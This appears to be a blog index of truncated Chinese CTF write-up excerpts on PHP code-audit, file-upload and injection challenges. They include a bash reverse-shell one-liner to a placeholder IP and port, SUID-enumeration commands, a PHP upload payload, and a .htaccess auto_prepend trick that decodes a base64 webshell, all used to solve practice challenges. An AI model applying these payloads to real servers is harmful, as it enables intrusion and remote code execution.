R4x

[NSSCTF] WP 6[HNCTF 2022 WEEK3] Fun_php开门源码, 应该是一个经典的 php 特性 byss 题目: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071<?phperror_reporting(0);highlight_file(__FILE__);include "k1y.php";include "fl4g.php";$week_1 = false;$week_2 = false;$getUserID = @$_GET['user']; $getpass = (int)@$_GET['pass']; $getmySaid = @$_GET['mySaid']; $getmyHeart =...

[Polar ctf WEB] 困难区 wp 2[Polar WEB] 自由的文件上传系统题解打开是一个文件上传页面, 尝试传个马上去, 发现后台会自动把 <? 替换成 <! 导致不能成功, 此时观察一下网页源代码, 发现 url 有一点奇怪, 扫一下目录: 扫出了 git 源码泄露问题, 这里用 dumpall 工具恢复源码, 用 pip 装一个就行; 很可惜扫完好像没什么东西在里面; 再看一下 url, 可能有文件包含, 可惜似乎禁了伪协议, 也没什么头绪, 那只能再试试上传点了: 1<script language="php">system("ls");</script> 直接访问不显示结果, 试试刚刚的文件包含: 到这里再传个码进去就行了: [Polar WEB] ezjava题解 (SpEL 注入)题目给了个 jar 包, 添加到 IDEA 库里反编译: 注意看这里, 有一处可疑的注入点: 1234567public String spelVul(String ex)...

[NSSCTF] WP 5[HNCTF 2022 Week1] Challenge__rce题解访问网站发现源码有个 hint 注释, 尝试 GET 传个 hint 进去, 出现 WAF 源码: 123456789101112131415161718192021<?phperror_reporting(0);if (isset($_GET['hint'])) { highlight_file(__FILE__);}if (isset($_POST['rce'])) { $rce = $_POST['rce']; if (strlen($rce) <= 120) { if (is_string($rce)) { if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) { ...

Crypto 3 - 现代密码学基础密码学基础针对加密算法的攻击首先来回顾一下密码学中常见的攻击手段: 从已掌握信息的角度, 分为: 已知密文攻击 (Ciphertext-only, COA): 最弱的攻击, 攻击者只有密文; 已知明文攻击 (Known-plaintext attack, KPA): 攻击者拥有部分密文和与之对应的明文对; 选择明文攻击 (Chosen-plaintext attack, CPA): 攻击者可以任意选择明文, 然后获得对应的密文对; 选择密文攻击 (Chosen-ciphertxt attack, CCA): 攻击者可以任意选择密文, 然后获得对应的明文对; 从攻击手段来看, 大致有: 统计分析攻击: 利用明文 (或语言) 固有的统计特性 (字母/字母对/词频、重复模式、重合指数等) 从密文中推断密钥或明文。属于密码分析经典方法, 常用于对抗简单替换/置换类密码或当加密未能完全掩盖明文统计特征时。 例如考虑 字典/凯撒 密码, 对一段英文原文进行加密得到的密文, 由于英语的语言特性, ...

[NSSCTF Web ] 部分 WP 4[WUSTCTF 2020 WEB] CV Maker题解打开是一个论坛, 先创建一个账户, 注意到可以上传头像: 通过修改文件类型并添加文件头即可, 返回界面中有重命名后的路径: 连上蚁剑, 发现在 /flag 中, 不过权限不够读不出来, 也就是要提权, 那么先发个反弹 shell 出来: 1bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' 接收到反弹 shell 后, 枚举一下特权指令: 12sudo -lfind / -perm -u=s -type f 2>/dev/null 注意到结果里有一个 /readflag, 并且是可执行文件, 那直接用这个指令去读 /flag 试试, 成功; [SDCTF 2022] jawt that down!信息泄露扫一下目录: 没找到攻击面, 只能再仔细扫一下: 审计一下这个非常恶心的 login.js, 里面有账密: 登录之后访问首页上的 /n, 显示被 403,...

[buuctf] web + crypto write up 11[Crypto] 丢失的 md5题解直接跑出来就行, 这里改成了 python3 支持的形式: 123456789import hashlib for i in range(32,127): for j in range(32,127): for k in range(32,127): m=hashlib.md5() m.update('TASC'+chr(i)+'O3RJMV'+chr(j)+'WDJKX'+chr(k)+'ZM') des=m.hexdigest() if 'e9032' in des and 'da' in des and '911513' in des: print des [Crypto] Alice 与...

[Polar ctf WEB] 困难区 wp 1[Polar WEB] 上传题解首先尝试 shell.php 无论如何不能成功, 考虑 jpg + .htaccess 的组合: 首先 shell.jpg 可以传, 之后 .htaccess: 把 file 换成 url 编码: 成功, 可惜似乎不能解析; 例外图片不能有 <?, 因此试试传 base64 的图片码, 用 .htaccess 来解码: 反斜杠绕过试试: 12345#define width 1337#define height 1337php_value auto_prepend_fi\le "php://filter/convert.base64-decode/resource=./shell.jpg"AddType application/x-httpd-php .jpg 成功; 这题的关键就在于利用反斜杠去 bypass; [WEB] PHP是世界上最好的语言题解开门审计: 1234567891011121314151617181920212223242526...

[buuctf] web区 write up 9[GXYCTF2019] StrongestMind题解打开是一个计算题的提交页面, 根据网页内容应该要算 1000 次; 观察一下返回的结构, 写个自动化计算的脚本就行了: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#!usr/bin/env python# strongest_mind.pyfrom time import sleepimport requestscount = 0url = 'http://2f3e742e-8766-4a75-86af-b24b3d2c7ff1.node5.buuoj.cn:81/index.php'proxies = { "http": "http://127.0.0.1:8080", "https":...

[NSSCTF Web + mobile] 部分 WP 3[极客大挑战 2020] greatphp 题目描述:1.md5(sha1) a string, an array, or?2.End the past and create a new phpcode! 代码审计1234567891011121314151617181920212223242526272829<?phperror_reporting(0);class SYCLOVER { public $syc; public $lover; // 反序列化时调用 public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){ ...

[buuctf] web区 write up 8[2022DASCTF MAY 出题人挑战赛] Power Cookie题解点登录, 然后抓包, 可以看见服务器返回了一个 cookie: 所以传 cookie: admin=1 过去, 直接显示了 flag; [2021DASCTF 实战精英夏令营暨 DASCTF July X CBCTF 4th]cat flag代码审计开门见源码: 12345678910111213<?phpif (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); }} else { ...